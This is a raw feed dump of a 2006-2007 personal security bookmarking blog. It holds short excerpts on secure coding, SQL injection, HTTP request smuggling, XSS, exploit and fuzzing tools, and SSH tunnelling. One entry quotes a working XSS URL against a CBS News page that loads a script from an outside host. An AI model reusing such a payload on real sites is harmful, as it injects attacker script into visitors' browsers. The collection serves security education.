tag:blogger.com,1999:blog-303264972024-03-08T12:55:57.136+05:30- Dumpster Dive -<b>A personal bookmarking site dedicated to<br>network security, open source, linux and programming.</b><br>Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.comBlogger54125tag:blogger.com,1999:blog-30326497.post-45724500277363133312007-01-31T19:14:00.000+05:302007-01-31T19:25:23.524+05:30CERT Secure Coding StandardsFrom www.cert.org/secure-coding,As part of the CERT Secure Coding Initiative, the Computer Emergency Response Team (CERT) has deployed a new collaborative web site, SecureCoding, dedicated to developing secure coding standards for various programming languages. CERT's initial efforts are focused on the development of secure coding practices for the C and C++ programming languages. Rules and Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161586084654180762006-10-23T12:13:00.000+05:302006-12-21T19:02:19.266+05:30CWE - Common Weakness EnumerationFrom cwe.mitre.orgCWE is a community-developed dictionary of common software weaknesses targeted to developers and security practitioners."...CWE is a community-developed formal list of common software weaknesses. It serves as a common language for describing software security weaknesses, a standard measuring stick for software security tools targeting these vulnerabilities, and as a baseline Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com1tag:blogger.com,1999:blog-30326497.post-1161585696902831962006-10-23T12:09:00.000+05:302006-10-23T12:12:56.980+05:30Build Security In - BSIFrom, buildsecurityin.us-cert.govBuild Security In (BSI) is a project of the Strategic Initiatives Branch of the National Cyber Security Division (NCSD) of the Department of Homeland Security (DHS). The Software Engineering Institute (SEI) was engaged by the NCSD to provide support in the Process and Technology focus areas of this initiative. The SEI team and other contributors develop and Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161585468103866802006-10-23T12:05:00.000+05:302006-10-23T12:08:58.213+05:30An Illustrated Guide to IPsecFrom, Steve Friedl's Unixwiz.net Tech Tips, unixwiz.net"...IPsec is a suite of protocols for securing network connections, but the details and many variations quickly become overwhelming. This is particularly the case when trying to interoperate between disparate systems, causing more than one engineer to just mindlessly turn the knobs when attempting to bring up a new connection.This Tech Tip Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161585266901169472006-10-23T12:02:00.000+05:302006-10-23T12:05:47.993+05:30Netdude - a Framework for Packet Trace ManipulationNetdude is a framework for inspection, visualization, and modification of tcpdump packet trace files. Its modular design allows users to interact with the framework at different abstraction levels: a low-level trace navigation wrapper for libpcap called libpcapnav, a high-level API with convenient types for performing common packet manipulation tasks in libnetdude, and a GUI application that Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161585067351668572006-10-23T11:58:00.000+05:302006-10-23T12:02:30.380+05:30SQL Injection WalkthroughFrom SecuriTeam.comSQL Injection is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161584837725241212006-10-23T11:55:00.000+05:302006-10-23T11:58:45.196+05:30HTTP Request Smuggling attackFrom Prashant Gawade, Palisade Magazine."...HTTP Request Smuggling (HRS) attack is the result of a device failure to properly handle deformed inbound HTTP requests. HRS works by taking benefit of the discrepancies in HTTP request parsing when one or more HTTP devices are in the data flow between the user and the web server. HTTP Request smuggling leads to various attacks like web cache poisoningJayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161584612999618322006-10-23T11:51:00.000+05:302006-10-23T11:55:29.233+05:30vTun - Virtual TunnelsFrom vtun.sourceforge.netVTun is the easiest way to create Virtual Tunnels over TCP/IP networks with traffic shaping, compression, and encryption. It supports IP, PPP, SLIP, Ethernet and other tunnel types. VTun is easily and highly configurable and can be used for various network tasks like VPN, Mobile IP, etc.read more ...Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161583208242743202006-10-23T11:25:00.000+05:302006-10-23T11:31:57.993+05:30Reading C type declarationsFrom, Steve Friedl's Unixwiz.net Tech Tips, unixwiz.net" ... Even relatively new C programmers have no trouble reading simple C declarations such as int foo[5]; // foo is an array of 5 intschar *foo; // foo is a pointer to chardouble foo(); // foo is a function returning a double but as the declarations get a bit more involved, it's more difficult to know exactly Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161524290041080682006-10-22T19:06:00.000+05:302006-10-22T19:11:02.696+05:30Your Field Guide To Designing Security Into Networking ProtocolsFrom, Mark Pustilnik & Andrew Roths, MSDN Magazine.Designing a secure protocol is a treacherous task. This article outlines some of the most common pitfalls that await you, but there are many others. Perhaps the best insurance against making mistakes is having your design reviewed by knowledgeable peers, documenting your security guarantees as well as your thought process, and making sure that noJayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161523166671571642006-10-22T18:46:00.000+05:302006-10-22T18:55:49.496+05:30One-way Web HackingFrom Saumil Shah, net-square.com One-way web hacking is a technique which relies purely on HTTP traffic to attack and penetrate web servers and application servers. This technique was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1161522025414829442006-10-22T18:25:00.000+05:302006-10-22T18:32:04.436+05:30DHCPing - BOOTP/DHCP audit toolFrom Gregory Duchemin, dhcping.openwall.netDHCPing is a lightweight and featureful security tool written in PERL and designed to test the security of various flavors of DHCP implementations around. DHCPing also offers several exploits for the latest vulnerabilities in DHCP implemetation of various vendors along with a set of generic attacks.A list of the vulnerabilities that DHCPing has Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1158157162645273382006-09-13T19:41:00.000+05:302007-01-23T03:38:59.470+05:30THC Nokia Phone-Lock ResetThe Hacker's Choice has released a tool, thc-nokia-unlock, that exploits a design flaw in nokia mobile phones to remove the phone-lock.The Phone Lock feature is designed to disable the key pad, bluetooth and the USB port. This makes it impossible to access the data stored on the device without knowing the correct code.This unlock tool make use of some undocumented features of the Symbian OS whichJayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com1tag:blogger.com,1999:blog-30326497.post-1158156675824845132006-09-13T19:40:00.000+05:302006-09-13T19:59:45.120+05:30Nmap Scripting EngineFrom, Buanzo's Consulting blog. Nmap-dev mailing list is having an announcement about the final release of Nmap Scripting Engine. A a sample script written by Buanzo for detection of SMTP Open Relay is available here.read more ...Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157479382401295192006-09-05T23:30:00.000+05:302006-09-05T23:38:58.933+05:30PaiMei reverse engineering frameworkFrom pedram.redhive.comPaiMei, is a reverse engineering framework consisting of multiple extensible components. The framework can essentially be thought of as a reverse engineer's swiss army knife and has already been proven effective for a wide range of both static and dynamic tasks such as fuzzer assistance, code coverage tracking, data flow tracking and more.read more ...More tools from this Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157479063174773282006-09-05T23:23:00.000+05:302006-09-05T23:38:10.893+05:30Process StalkerFrom pedram.redhive.com,Process Stalking is a term coined to describe the combined process of run-time profiling, state mapping and tracing. Consisting of a series of tools and scripts the goal of a successful stalk is to provide the reverse engineer with a intuitive interface to run-time block-level trace data.The Process Stalking suite is broken into three main components; an IDA Pro plug-in, aJayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157478545021321432006-09-05T23:14:00.000+05:302006-09-05T23:37:23.116+05:30eEye Research ToolsA lot of previously unreleased research tools are now made available at eEye research website, research.eEye.com.read more ...Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157478159369422122006-09-05T23:10:00.000+05:302007-01-29T14:41:17.366+05:30AxMan ActiveX fuzzing engineFrom metasploit.comAxMan is a web-based ActiveX fuzzing engine. The goal of AxMan is to discover vulnerabilities in COM objects exposed through Internet Explorer. Since AxMan is web-based, any security changes in the browser will also affect the results of the fuzzing process. This allows for a much more realistic test than other COM-based assessment tools. AxMan is designed to be used with Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157476698938017812006-09-05T22:47:00.000+05:302006-09-05T23:35:01.966+05:30AttackAPIFrom gnucitizen.orgAttackAPI provides simple and intuitive web programmable interface for composing attack vectors with JavaScript and other client (and server) related technologies. The current release supports several browser based attacking techniques and simple but powerful JavaScript console.read more ...Other interesting projetcs from gnucitizen.org,i) JavaScript Shell ii) JavaScript Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157475780395419962006-09-05T22:29:00.000+05:302006-09-05T23:09:33.040+05:30Demystifying Cross Site Scripting AttacksFrom David KierznowskiAwaking the Sleeping Giant v1.0Demystifying Cross Site Scripting AttacksAuthor: David KierznowskiThis paper attempts to demystify and categorise current XSS entry nodes, attack capabilities and trends.XSS attacks are gaining popularity quickly. There are loads of vulnerabilities waiting to be found. It can be simple and difficult to prevent. It can propogate around the Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157473351870523282006-09-05T21:48:00.000+05:302006-09-05T22:22:44.543+05:30How to get linked from SlashdotFrom Jeremiah Grossman's blogA five step process, making use of Slashdot's PreviewStory feature, to create URL's that link anywhere and say anything.read more ...Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157469535342173232006-09-05T20:45:00.000+05:302006-09-05T20:57:17.733+05:30Live ViewFrom LiveView site"...Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. This allows the forensic examiner to "boot up" the image or disk and gain an interactive, user-level perspective of the environment, all without modifying the underlying image or disk. Because all changes made to the disk are written Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157469135916738292006-09-05T20:39:00.000+05:302006-09-05T20:55:42.836+05:30WildPackets OmniPeek Personal" ...OmniPeek Personal, the first commercially developed Expert network analyzer available free for personal use. OmniPeek Personal gives individual users the chance to experience the power and extensibility of WildPackets’ award-winning network analysis technology at no cost.OmniPeek Personal offers: * Best-in-class wired and wireless analysis in one application * Intuitive real-time graphics Jayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1157467897737965192006-09-05T20:21:00.000+05:302006-09-05T20:25:11.710+05:30XSS DemonstrationSecurityLab posted a demonstration of Cross Site Scripting (XSS) vulnerabilities in CBS News and the BBC websites.Looks like BBC has now fixed this flaw in their website but CBS News is still vulnerable.The URL they provide for CBS is:http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--TheJayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0tag:blogger.com,1999:blog-30326497.post-1155971897732895902006-08-19T12:44:00.000+05:302006-09-05T20:23:43.420+05:30Secure Surfing at the Coffee ShopFrom, Kyle Haugsness, SANS Handler's Diary This tip is how to use SSH port forwarding to browse the web at your favorite coffee shop (or hacker conference).1) Setup a machine on your home network. If you don't have a static IP address, then use dynamic DNS.2) On this machine setup squid (http://www.squid-cache.org/) and bind it only to localhost. Do this with the "http_port 127.0.0.1:3128" lineJayeshhttp://www.blogger.com/profile/07732221430964853422noreply@blogger.com0